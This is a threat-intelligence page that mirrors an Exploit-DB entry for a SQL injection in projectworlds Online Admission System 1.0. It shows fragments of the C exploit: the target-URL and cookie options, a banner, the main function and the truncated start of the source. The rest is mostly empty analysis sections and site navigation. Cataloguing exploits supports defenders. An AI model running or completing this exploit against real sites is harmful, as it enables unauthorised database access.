%zu)\e[0m\n", autoLen,lenInjectResponse); } printf("\e[0;37m+-------------------------------------------------------------------------------------+\e[0m\n"); } int main(int argc, const char **argv) { printf( "\e[1;31m" "$$$$$$\\ $$\\ $$\\ $$$$$$$$\\ $$$$$$\\ $$$$$$\\ $$$$$$\\ $$$$$$$\\ $$$$$$\\ $$\\ $$\\ $$$$$$$$\\ $$\\ \n" "$$ __$$\\ $$ | $$ |$$ _____| $$ __$$\\ $$$ __$$\\ $$ __$$\\ $$ ____| $$ __$$\\ $$ | $$ |\\____$$ |$$$$ | \n" "$$ / \\__|$$ | $$ |$$ | \\__/ $$ |$$$$\\ $$ |\\__/ $$ |$$ | $$ / $$ |$$ | $$ | $$ / \\_$$ | \n" "$$ | \\$$\\ $$ |$$$$$\\ $$$$$$\\ $$$$$$ |$$\\$$\\$$ | $$$$$$ |$$$$$$$\\ $$$$$$\\ $$$$$$ |$$$$$$$$ | $$ / $$ | \n" "$$ | \\$$\\$$ / $$ __|\\______|$$ ____/ $$ \\$$$$ |$$ ____/ \\_____$$\\______|$$ __$$< \\_____$$ | $$ / $$ | \n" "$$ | $$\\ \\$$$ / $$ | $$ | $$ |\\$$$ |$$ | $$\\ $$ | $$ / $$ | $$ | $$ / $$ | \n" "\\$$$$$$ | \\$ / $$$$$$$$\\ $$$$$$$$\\ \\$$$$$$ /$$$$$$$$\\ \\$$$$$$ | \\$$$$$$ | $$ |$$ / $$$$$$\\ \n" " \\______/ \\_/ \\________| \\________| \\______/ \\________| \\______/ \\______/ \\_|\\__/ \\______| \n" "\e[1;37m \t\t\t\t\t\t\t\t\t\t\t\t Byte Reaper\n" ); printf("\e[1;31m---------------------------------------------------------------------------------------------------------------------------------------\n"); const char *baseurl = NULL; const char *nameFileC = NULL; struct argparse_option options[] = { OPT_HELP(), OPT_STRING('u', "url", &baseurl, "Enter Target Url (BASE URL)"), OPT_STRING('c', "cookies", &nameFileC, "Enter File cookies"), OPT_BOOLEAN('v', "verbose", &verbose, "Verbose Mode"), OPT_END(), }; struct argparse argparse; argparse_init(&argparse, options, NULL, 0); argparse_parse(&argparse, argc, argv); if (!baseurl) { printf("\e[1;31m[-] Please Enter target Url !\e[0m\n"); printf("\e[1;31m[-] Example : ./exploit -u http://<TARGET>\e[0m\n"); syscallLinux(); } if (nameFileC) { selCookie = 1; } if (verbose) { verbose = 1; } value(baseurl); return 0; }

Source: Exploit-DB RSS Feed

Published: Mon Aug 11 2025

projectworlds Online Admission System 1.0 - SQL Injection

Medium

Exploitweb exploit

Published: Mon Aug 11 2025 (08/11/2025, 00:00:00 UTC)

Source: Exploit-DB RSS Feed

Description

projectworlds Online Admission System 1.0 - SQL Injection

AI-Powered Analysis

AILast updated: 11/03/2025, 09:41:36 UTC

Technical Analysis

Potential Impact

Mitigation Recommendations

Affected Countries

Need more detailed analysis?Get Pro

Pro Feature

For access to advanced analysis and higher rate limits, contact root@offseq.com

Technical Details

Edb Id: 52398
Has Exploit Code: true
Code Language: c

Indicators of Compromise

Exploit Source Code

Exploit Code

Exploit code for projectworlds Online Admission System 1.0 - SQL Injection

/*
 * Title           : projectworlds Online Admission System 1.0 - SQL Injection
 * Author       : Byte Reaper
 * CVE          : CVE-2025-8471
 */
#include <stdio.h>
#include <string.h>
#include <curl/curl.h>
#include <stdlib.h>
#include "argparse.h"
#include <time.h>
#define FULL 2200
int verbose = 0;
int selCookie = 0;
const char *cookies;
void sleepAssembly(void)
{
    struct timespec s ;
    s.tv_sec = 0;
    s.tv_nsec = 500000000;
    
    __asm__ volatile
    (
        "mov $35, %%rax\n\t... (21278 more characters)

Code Length: 21,778 characters • Language: C/C++

Threat ID: 689a95b8ad5a09ad002b09a8

Added to database: 8/12/2025, 1:15:36 AM

Last enriched: 11/3/2025, 9:41:36 AM

Last updated: 11/11/2025, 11:32:00 AM

Community Reviews

0 reviews

Crowdsource mitigation strategies, share intel context, and vote on the most helpful responses. Sign in to add your voice and help keep defenders ahead.

Sort by

Loading community insights…

Want to contribute mitigation steps or threat intel context? Sign in or create an account to join the community discussion.

Related Threats

Actions

PRO

Updates to AI analysis require Pro Console access. Upgrade inside Console → Billing.

Please log in to the Console to use AI analysis features.

External Links

Original Source Raw Exploit Code Search on Google

Need enhanced features?

Contact root@offseq.com for Pro access with improved analysis and higher rate limits.

projectworlds Online Admission System 1.0 - SQL Injection

AI Analysis

Technical Summary

Potential Impact

Mitigation Recommendations

Affected Countries

Indicators of Compromise

projectworlds Online Admission System 1.0 - SQL Injection

Description

AI-Powered Analysis

Technical Analysis

Potential Impact

Mitigation Recommendations

Affected Countries

Technical Details

Indicators of Compromise

Exploit Source Code

Exploit code for projectworlds Online Admission System 1.0 - SQL Injection

Community Reviews

Related Threats

Critical Triofox bug exploited to run malicious payloads via AV configuration

Cisco Finds Open-Weight AI Models Easy to Exploit in Long Conversations

Runc Vulnerabilities Can Be Exploited to Escape Containers

Two New Web Application Risk Categories Added to OWASP Top 10

Nearly 30 Alleged Victims of Oracle EBS Hack Named on Cl0p Ransomware Site

Actions

External Links

Need enhanced features?

Latest Threats

Keyboard Shortcuts

Navigation

Search & Filters

UI Controls

Accessibility